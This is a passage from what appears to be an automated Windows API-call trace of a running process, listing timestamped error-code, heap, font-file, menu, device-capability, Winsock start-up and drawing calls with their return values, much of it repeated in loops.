(dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.900] SetLastError (dwErrCode=0x0) [0025.900] GetLastError () returned 0x0 [0025.901] SetLastError (dwErrCode=0x0) [0025.901] GetLastError () returned 0x0 [0025.901] SetLastError (dwErrCode=0x0) [0025.901] GetLastError () returned 0x0 [0025.901] SetLastError (dwErrCode=0x0) [0025.901] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetLastError () returned 0x0 [0025.902] SetLastError (dwErrCode=0x0) [0025.902] GetWindowsDirectoryA (in: lpBuffer=0x18fdb8, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0025.903] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x18) returned 0x1ce1280 [0025.903] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x18) returned 0x1ce12a0 [0025.903] CreateFileA (lpFileName="C:\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18fc00, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0025.904] GetFileType (hFile=0xd0) returned 0x1 [0025.904] ReadFile (in: hFile=0xd0, lpBuffer=0x421720, nNumberOfBytesToRead=0xf4000, lpNumberOfBytesRead=0x18fc30, lpOverlapped=0x0 | out: lpBuffer=0x421720*, lpNumberOfBytesRead=0x18fc30*=0xb6cb0, lpOverlapped=0x0) returned 1 [0025.947] ReadFile (in: hFile=0xd0, lpBuffer=0x4d83d0, nNumberOfBytesToRead=0x3d000, lpNumberOfBytesRead=0x18fc30, lpOverlapped=0x0 | out: lpBuffer=0x4d83d0*, lpNumberOfBytesRead=0x18fc30*=0x0, lpOverlapped=0x0) returned 1 [0025.947] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8c) returned 0x1ce12c0 [0025.947] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1358 [0025.947] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x60) returned 0x1ce1368 [0025.947] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x104) returned 0x1ce13d0 [0025.947] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x14) returned 0x1ce14e0 [0025.948] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x14) returned 0x1ce1500 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce14e0 | out: hHeap=0x1ce0000) returned 1 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1500 | out: hHeap=0x1ce0000) returned 1 [0025.948] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x14) returned 0x1ce14e0 [0025.948] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x14) returned 0x1ce1500 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1500 | out: hHeap=0x1ce0000) returned 1 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce14e0 | out: hHeap=0x1ce0000) returned 1 [0025.948] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x14) returned 0x1ce14e0 [0025.948] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x14) returned 0x1ce1500 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1500 | out: hHeap=0x1ce0000) returned 1 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce14e0 | out: hHeap=0x1ce0000) returned 1 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce13d0 | out: hHeap=0x1ce0000) returned 1 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1358 | out: hHeap=0x1ce0000) returned 1 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1368 | out: hHeap=0x1ce0000) returned 1 [0025.948] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12c0 | out: hHeap=0x1ce0000) returned 1 [0025.948] CreateMenu () returned 0x3016d [0025.948] LoadMenuA (hInstance=0x400000, lpMenuName="Menu") returned 0x0 [0025.948] LoadBitmapA (hInstance=0x400000, lpBitmapName="Bitmap") returned 0x0 [0025.949] AppendMenuA (hMenu=0x3016d, uFlags=0x14, uIDNewItem=0x0, lpNewItem=0x0) returned 1 [0025.951] LoadMenuA (hInstance=0x400000, lpMenuName="Edit") returned 0x0 [0025.962] CryptCATGetMemberInfo () returned 0x0 [0025.962] GetDeviceCaps (hdc=0x0, index=112) returned 0 [0025.962] GetDeviceCaps (hdc=0x0, index=88) returned 0 [0025.962] GetDeviceCaps (hdc=0x0, index=113) returned 0 [0025.962] GetDeviceCaps (hdc=0x0, index=90) returned 0 [0025.962] GetDeviceCaps (hdc=0x0, index=110) returned 0 [0025.962] GetDeviceCaps (hdc=0x0, index=88) returned 0 [0025.962] GetDeviceCaps (hdc=0x0, index=112) returned 0 [0025.962] GetDeviceCaps (hdc=0x0, index=111) returned 0 [0025.962] GetDeviceCaps (hdc=0x0, index=90) returned 0 [0025.962] GetDeviceCaps (hdc=0x0, index=113) returned 0 [0025.962] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.963] IsWindowEnabled (hWnd=0x0) returned 0 [0025.964] SetPixelFormat (hdc=0x0, format=12, ppfd=0x18fb10) returned 0 [0027.332] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x18fb94 | out: lpWSAData=0x18fb94) returned 0 [0027.342] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0027.342] GetLastError () returned 0x578 [0027.342] CreateICA (pszDriver="DISPLAY", pszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x150107c8 [0027.346] OleTranslateColor () returned 0x0 [0027.346] SecurityDescriptorToBinarySD (vVarSecDes=0x18fa98, ppSecurityDescriptor=0x18faf8, pdwSDLength=0x18fb4c, pszServerName=0x0, userName=0x0, passWord=0x0, dwFlags=0x0) returned 0x80004005 [0027.346] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce12c0 [0027.346] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce12d0 [0027.346] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce12f8 [0027.346] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.346] BinarySDToSecurityDescriptor (pSecurityDescriptor=0x0, pVarsec=0x18fafc, pszServerName=0x0, userName=0x0, passWord=0x0, dwFlags=0x0) returned 0x80004005 [0027.347] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.347] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.347] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.347] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.347] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.347] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.347] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.347] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.348] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.348] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.348] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.348] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.348] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.349] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.349] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.349] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.349] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.349] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.350] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.350] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.350] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.350] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.350] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.351] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.351] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.351] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.351] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.351] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.351] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.352] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.352] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.352] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.352] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.352] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, 